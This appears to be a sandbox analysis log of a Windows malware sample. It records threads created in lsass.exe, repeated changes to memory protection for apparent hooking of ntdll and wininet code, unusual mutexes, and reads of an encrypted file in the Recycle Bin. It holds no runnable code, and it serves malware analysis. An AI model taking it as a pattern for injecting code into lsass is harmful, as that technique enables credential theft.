C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 20 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 44 BAD667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\crypt32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 9C0000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown BE0000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit BE0000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit BE0000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit BE0000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit F60000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 9B06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
660 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 9B0639
2628 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
2624 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1932 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
484 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1760 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1976 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1004 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
3964 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
9768 0s success or wait 933 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
660 692 success or wait 0 9B0279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
692 C:\WINDOWS\system32\lsass.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 9B05EC
692 C:\WINDOWS\system32\lsass.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
692 C:\WINDOWS\system32\lsass.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
692 C:\WINDOWS\system32\lsass.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
692 C:\WINDOWS\system32\lsass.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
692 C:\WINDOWS\system32\lsass.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
692 C:\WINDOWS\system32\lsass.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
692 C:\WINDOWS\system32\lsass.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
692 C:\WINDOWS\system32\lsass.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
692 C:\WINDOWS\system32\lsass.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
692 C:\WINDOWS\system32\lsass.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
692 C:\WINDOWS\system32\lsass.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
692 C:\WINDOWS\system32\lsass.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
692 C:\WINDOWS\system32\lsass.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
692 C:\WINDOWS\system32\lsass.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
692 C:\WINDOWS\system32\lsass.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
692 C:\WINDOWS\system32\lsass.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
692 C:\WINDOWS\system32\lsass.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2031079937
Thread created PID: 692 TID: 660 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031084682
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031086781
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2031089015
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 9C0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2031122248
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2031130836
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2031143263
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2031279926
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2031290718
Thread created PID: 692 TID: 2628 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031295631
Thread delayed Time: 0 TID: 9768 success or wait 2031297173
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2031297765
System info queried Type: BasicInformation success or wait 2031298069
System info queried Type: ProcessorInformation success or wait 2031298368
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031298774
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031299617
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031299880
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031300255
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031300513
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031300820
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031301414
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031301672
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031302591
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031302935
System info queried Type: BasicInformation success or wait 2031303734
System info queried Type: ProcessorInformation success or wait 2031304029
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031305304
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031305610
Thread created PID: 692 TID: 2624 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031307204
Thread created PID: 692 TID: 1932 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031309892
Thread delayed Time: 0 TID: 9768 success or wait 2031312203
Thread delayed Time: 0 TID: 9768 success or wait 2031312598
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031312781
System info queried Type: BasicInformation success or wait 2031313081
System info queried Type: ProcessorInformation success or wait 2031313376
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031313781
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031314630
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031314892
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031315277
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031315533
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031315841
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031316435
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031316767
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031317294
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031317630
System info queried Type: BasicInformation success or wait 2031318430
System info queried Type: ProcessorInformation success or wait 2031318725
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031319945
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031320250
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031320557
System info queried Type: BasicInformation success or wait 2031320848
System info queried Type: ProcessorInformation success or wait 2031321138
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031321542
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031322380
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031322642
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031323026
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031323358
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031323783
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031324622
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031324968
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031325688
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031326264
System info queried Type: BasicInformation success or wait 2031327261
System info queried Type: ProcessorInformation success or wait 2031327672
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031329116
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031329425
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031329734
System info queried Type: BasicInformation success or wait 2031330028
System info queried Type: ProcessorInformation success or wait 2031330318
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031330726
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031331598
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031331863
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031332256
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031332517
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031332827
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031333431
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031333691
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031334221
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031334558
System info queried Type: BasicInformation success or wait 2031335356
System info queried Type: ProcessorInformation success or wait 2031335650
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031337033
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031337337
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031337851
System info queried Type: BasicInformation success or wait 2031338145
System info queried Type: ProcessorInformation success or wait 2031338434
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031338840
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031339691
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031339954
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031340342
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031340601
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031340911
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031341513
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031341772
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031342299
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031342633
System info queried Type: BasicInformation success or wait 2031343419
System info queried Type: ProcessorInformation success or wait 2031343713
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031344927
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031345231
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2031346252
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2031348082
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2031349092
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031363007
System info queried Type: BasicInformation success or wait 2031363239
System info queried Type: ProcessorInformation success or wait 2031363550
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031363968
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031364836
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2031365109
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031365741
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031366015
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2031366337
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031366954
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2031367224
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031367762
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2031368111
